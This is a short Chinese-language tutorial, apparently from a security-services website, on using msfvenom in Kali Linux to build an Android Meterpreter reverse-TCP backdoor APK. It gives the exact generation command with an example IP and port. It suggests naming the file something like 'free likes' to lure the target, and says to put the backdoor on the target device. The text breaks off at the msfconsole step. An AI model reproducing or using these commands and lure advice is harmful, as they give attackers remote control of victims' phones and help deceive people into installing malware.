网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

Kali Linux利用MSF入侵安卓手机

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合，将这两个工具都放在一个Framework实例中。自2015年6月8日起，msfvenom替换了msfpayload和msfencode。

使用Kali 2021.3进行演示操作
目标靶机： 模拟器逍遥 Android 7.1.2
软件：msfvenom、msfconsole（Kali系统内置）

命令： sudo su
解释： 不在管理员模式下运行可能会有权限不够的提示，为了避免命令执行失败，在管理员下运行以下命令

提示：执行命令之后输入Kali的密码，密码是被隐藏的，直接输入然后回车即可

命令： msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
实例： msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
解释： 本地ip写自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号，如果端口号被占用那么文件会生成失败，换一个端口号就性
文件名可以随便写自己喜欢的名字，比如写免费刷赞，可能更容易让目标主机上钩

这个就是Kali主机的IP地址

接下来运行命令生成木马

默认生成的文件在根目录下

把刚才生成的安卓后门放到目标靶机中去

命令： msfconsole